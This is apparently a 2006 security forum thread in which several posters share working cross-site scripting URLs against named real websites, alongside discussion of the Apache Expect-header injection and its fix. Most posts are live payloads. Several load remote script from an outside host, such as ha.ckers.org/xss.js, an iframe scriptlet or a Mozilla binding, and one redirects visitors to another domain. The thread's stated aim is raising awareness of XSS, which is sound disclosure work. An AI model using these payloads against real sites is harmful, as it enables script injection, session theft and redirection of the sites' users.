It better not be your grandma. I remember rsnake 'hacked' into 127.0.0.1 earlier and found loads of grandma porn. He might try something sneaky.

- Kyran

Dude, this guy I hacked at 127.0.0.1 is a freak... grandma porn, greasy midget porn... the works!

- RSnake
Gotta love it. http://ha.ckers.org

haha, no i'm not your grandma. this is what led me to those sites:

intext:"site search"

damn you google! *shaking fist*

http://search.dangdang.com/dangdang.dll?key=%22%3E%3Cbody%20onload=alert(%22XSS%22)%3E&search_btn_top=%D4%DA%CB%F9%D3%D0%C9%CC%C6%B7%D6%D0%CB%D1&key1=&key2=&key3=&key4=&key5=&mode=&catalog=&sel1=1&sel2=1&sel3=1

Dang! Dangdang!

- RSnake
Gotta love it. http://ha.ckers.org

Looks like this particular thread has gotten some press guys:

http://www.darkreading.com/document.asp?doc_id=104313&f_src=darkreading_section_296

Keep up the good work. Sooner or later companies will start taking this seriously.

- RSnake
Gotta love it. http://ha.ckers.org

Great! Along with the ha.ckers post and the networkworld.com article, perhaps this will not just speed up the proccess but force companies to do something about it.

On a side note, another XSS...on the site talking about XSS!
[www.darkreading.com]

- Kyran

I love that you found that flaw on darkreading, I wonder if they'll actually re-read this thread and fix that.

After reading that my ego got a boost and a half :p

Anyway.... back to my web developing.

Edit: if you are planning to leave a comment in that article then... *cough*bugmenot.com*cough*

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer



Edited 1 time(s). Last edit at 09/21/2006 02:32PM by WhiteAcid.

Hahah! Be careful or people still stop linking to us! But if nothing else it proves the point - XSS really is everywhere.

Try this in Internet Explorer (mazda.com): http://ha.ckers.org/expect.swf?http://www.mazda.com/

- RSnake
Gotta love it. http://ha.ckers.org

http://nbc.resultspage.com/search?ts=custom&p=Q&uid=&w=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

Hmmm... I'm vulnerable to expect thing too. I know I can set up a custom error page but is there anything else you can suggest? Keep in mind whiteacid.org is on shared hosting so I can't edit httpd.conf

I may have missed a blog post or somethign, but can you give me some info on this flaw?

Edit: I've decompiled and read the actionscript, I've also sniffed thre traffic while running the swf off my localhost, so I can see why it's doing, but why is it IE only? Why does only IE print that header onto the page?

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer



Edited 1 time(s). Last edit at 09/21/2006 03:49PM by WhiteAcid.

Here is the original post about this - it was an Amit Klein find (and the .swf file is his too - I just borrowed it): http://ha.ckers.org/blog/20060731/expect-header-injection-via-flash/

- RSnake
Gotta love it. http://ha.ckers.org

Thanks

I just figure out why it doesn't work in firefox, here's the HTTP request created when I used IE:

GET / HTTP/1.1
Accept: */*
Accept-Language: en-gb
Content-Type: application/x-www-form-urlencoded
Expect: <script>alert(’http://www.whiteacid.org is vulnerable to the Expect Header vulnerability.’);</script>
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
Host: www.whiteacid.org
Connection: Keep-Alive

Here's that same request using firefox:

GET / HTTP/1.1
Host: www.whiteacid.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://127.0.0.1/expect.swf?http://www.whiteacid.org
Cookie: [removed]

Firefox doesn't allow/support the request header. Now then.... what are your suggestions on fixing this? Custom error page?
Edit: IE didn't post a referer but firefox did.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer



Edited 1 time(s). Last edit at 09/21/2006 04:37PM by WhiteAcid.

I emailed Apache this:
Hey

It's possible to run JavaScript on an arbitrary server using the
Response header. This works only in IE (tested with IE and FF) as FF
doesn't support/allow the header. To be honest I don't know if this is
IE fault or Apache, why I'd naturally lean towards it being IE fault,
I have this feeling that the Apache server is partly to blame too.
I've written about this here:
http://blogs.securiteam.com/index.php/archives/628

If you just want to test this yourself have a look here (in IE):
http://ha.ckers.org/expect.swf?http://www.mazda.com
http://ha.ckers.org/expect.swf?http://www.beyondsecurity.com

I'm not entirely sure how to fix this either, the only thing I can
come up with so far is creating a custom error page.

Thanks for your time.
Sid

The reply:
Hi Sid; This was previously reported in May, see
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3918

We fixed this by escaping the Expect error message in Apache HTTP Server
1.3.35, 2.0.58, and 2.2.2. I notice that this isn't mentioned on our
vulnerbilities page, which we'll correct tommorrow.

Thanks for contacting us.

Regards, Mark

Edit: oh and since the previous darkreading one was fixed, here's more:

http://www.darkreading.com/boards/message.asp?msg_id=138506<script>alert('xss')</script>
http://www.darkreading.com/boards/search.asp?search=<script>alert('xss')</script>&topic_id=30&thread_id=121715&filter=message_subject

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer



Edited 2 time(s). Last edit at 09/21/2006 05:27PM by WhiteAcid.

I just got home again and the darkreading hole was fixed, it seems.
Just more exposure for XSS, right? As the article said, it's lucky we aren't the bad guys.

As far as the EXPECT goes, I think for now the only real fix is a custom error page.

- Kyran

The post before yours has two more darkreading XSSes
If you can, upgrade Apache. I've emailed asking them what they suggest for work arounds if you can't upgrade (for instance if you're on a shared hosting).

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Did you try an .htaccess file with something like:

ErrorDocument 417 http://www.whatever.com/

I haven't tried it, so your milage may vary, and it depends on if the apache install is set up to allow for .htaccess overrides.

- RSnake
Gotta love it. http://ha.ckers.org

http://one.revver.com/browse/%3CBODY%20onload=alert(%22XSS%22)%3E

- RSnake
Gotta love it. http://ha.ckers.org

Mac guys really annoy me. =___=
And for those that've heard about it since BlackHat, even now when they get their ass handed to them as Apple releases a patch for the supposedly 'fake vulnerability' .. they're still complaining. Apparently since he told them the vulnerability existed, and in which driver - but didn't tell them exactly where - .. now that Apple has located it, proving it exists, it doesn't count because Apple found it. I really don't understand their smug illogical religion.

/*end rant.*/

In Other News, http://www.macworld.com/search/index.php?as=1&st=1&rf=1&rq=0&col=mwmcc&oqsecrets=url%3Asecrets+&dt=ba&ady=21&amo=9&ayr=2005&bdy=21&bmo=9&byr=2006&qt=%3Ciframe+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fscriptlet.html+%3C&nh=10&Search=Search+Again

-maluc

Nice... got the iframe exploit in there, huh? Yah, I was never much of a Mac guy...

1) Amiga
2) OS2
3) NEXT
4) Mac

Can we see a trend here? ;)

- RSnake
Gotta love it. http://ha.ckers.org

This is why I should own hacker.com: http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://hacker.com/enter.asp&hacker=www.hacker.com&name=&address=&city=&state=&postalcode=&country=&phone=&email=&offer=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&comments=&Submit=Submit

- RSnake
Gotta love it. http://ha.ckers.org

http://www.weather.com/search/enhanced?where=<script>alert('quack')</script>

http://search2.foxnews.com/search?ie=UTF-8&oe=UTF-8&client=my_frontend&proxystylesheet=my_frontend&output=xml_no_dtd&site=default_collection&q=%22;alert('quack')//

thx to WhiteAcid for the help on the fox one.

http://www.independent.co.uk/search/simple.do?searchString=%3Cscript%3Ealert%28%27quack%27%29%3C%2Fscript%3E

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 2 time(s). Last edit at 09/21/2006 11:56PM by digi7al64.

Weather that goes quack? Interesting...

- Kyran

Also, http://www.macworld.com/info/contact/form.php?e=///Not%20a%20Sploit%5C%22%20%3Cscript%3Ea=/XSS/;alert(a)%3C/script%3E

i really never gave email forms the attention they deserved in the past :/

Edit: note to self, make use of preview button before posting.

-maluc



Edited 1 time(s). Last edit at 09/21/2006 11:46PM by maluc.

Also, http://docs.info.apple.com/article.html?artnum=1233';alert('Shiver%20me%20Timbers.');document.location='http://%6D%61%63-%73%75%63%6B%73.com';a=%27

-maluc

Are XSS threats overblown?
http://www.scmagazine.com/us/news/article/594339/xss-flaws-jump-top-cve-rankings-threat-overblown/

Funny you should mention it:
http://www.scmagazine.com/us/search/index.cfm?fuseaction=XCU.Search.Simple&sSearchPhrase=%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org/xss.js%20&sSection=ALL&x=0&y=0

- RSnake
Gotta love it. http://ha.ckers.org

Quote

"XSS is now No.1. It literally took one year and probably less to reach No. 1," he said. "It actually pushed buffer overflow down to No. 4."

Well... that drop for overflows isn't all due to XSS, two other techniques must have helped.

Quote

[xss is] especially rampant because of the popularity of social networking sites.

No, it's rampant due to crappy coding.


The title is "...but is the threat overblown" but the article never mentions the thread being overblown (or the contrary). The only thing I saw was that the word overblown was also used in here:

Quote

The number of XSS flaws may be blown out of proportion

But that has nothing to do with the threat, that's the number of XSSes

Quote

"This is important to realize because XSS is now ranked by CVE as the most prevalent vulnerability, even more prevalent than buffer overflows," he said.

Yes, you already said that.

That "news" article severely needs re-writing.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

XSS in zdnet, also they are copypasta-ing the Mitre article there.
[www.zdnet.co.uk]




On another note, we made the news again.
http://www.scmagazine.com/uk/news/article/594339


EDIT - Ahaha. I had this window open for too long I suppose. Beat me to it.

- Kyran



Edited 1 time(s). Last edit at 09/22/2006 12:14PM by Kyran.

it's on scm's site, but a different domain hosting it:

http://www.careerbuilder.com/JobSeeker/Jobs/JobResults.aspx?S%3Asbkw=%22+style%3D-moz-binding%3Aurl%28http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%29+&S%3Asbcn=&S%3Asbsn=ALL&S%3Asbfr=30&S%3Asbsbmt=Search&cbsid=fa120e683b24470a9976bd14e5936ce9-212245906-WF-2&cid=US&lr=cbscmag&IPath=ILK&excrit=QID%3DA3849780031904%3Bst%3DA%3Buse%3DALL%3BrawWords%3D

firefox only, for autofun

-maluc

Ahh, this one's on their domain: http://www.scmagazine.com/us/awards/voting/index.cfm?fuseaction=XCU.Awards.Voting.Vote&nSubCatID=26140&uCategoryUuid=401b5be2-9cee-4298-9da4-0eaa4bf82348&uNomineeUuid=58f3627d-70e4-4bd7-bc30-ab660cdb17dd&sRandomString=66EDC001&checkCriteria_sName=You%20Are%20Voting%20On..%22%3E%3Cscript%3Ealert%28%22overblown%3F%21%22%29%3C%2Fscript%3E%3Cr%22&checkCriteria_sEmail=Best%20Web%20Filtering%20Solution&checkCriteria_bIsITProfessional=0&checkCriteria_bIsSubscriber=0&checkCriteria_bIsUSResident=0&checkCriteria_sCode=Ironic?&submit=submit

-maluc

I've been thinking, unless you are doing something sarcastic/ironic like maluc, perhaps we should all use the ha.ckers.org/xss.js script to show that remote scripts could be executed. Otherwise it's just an alert.

- Kyran